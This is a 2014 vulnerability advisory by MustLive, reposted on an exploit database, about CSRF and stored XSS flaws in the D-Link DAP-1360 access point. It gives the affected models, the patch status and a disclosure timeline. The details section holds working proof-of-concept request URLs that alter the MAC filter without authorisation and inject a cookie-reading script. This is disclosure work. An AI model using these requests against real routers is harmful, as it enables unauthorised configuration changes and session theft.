D-Link DAP-1360 XSS and CSRF

2014.11.29
Credit: MustLive
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-352

Hello list! There are Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP-1360 (Wi-Fi Access Point and Router). ------------------------- Affected products: ------------------------- Vulnerable is the next model: D-Link DAP-1360, Firmware 1.0.0. This model with other firmware versions also must be vulnerable. D-Link will fix these vulnerabilities in the next version of firmware (will be released in November), as they answered me in October. But in November they answered me, that firmware still was not publicly released due to the bugs and they need to work on it. I tested model DAP-1360/B/D1B. There are three models of DAP-1360: DAP-1360/B1A (f/w ver 2.xx) - D-Link will not add fixes, it's EOL device. DAP-1360/B/D1B (f/w ver 1.x.x - 2.x.x) - D-Link will fix the vulnerabilities in new firmware, which will be released in November. DAP-1360/A/E1A (f/w ver 2.5.4 or later) - the first public firmware includes fixes for the vulnerabilities. ---------- Details: ---------- In section Wi-Fi - MAC filter - Filter mode it's possible to change parameter MAC filter restrict mode: Disabled: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:0}]} Allow: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:1}]} Deny: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:2}]} In section Wi-Fi - MAC filter - MAC addresses it's possible to add and remove MAC addresses: Add: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22] Remove: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=44&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22] XSS (persistent XSS) (WASC-08): http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22] Code will execute at http://192.168.0.50/index.cgi#wifi/mac. ------------ Timeline: ------------ 2014.05.22 - informed developer about multiple vulnerabilities. 2014.06.21 - announced at my site about new vulnerabilities in DAP-1360. 2014.11.26 - disclosed at my site (http://websecurity.com.ua/7215/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top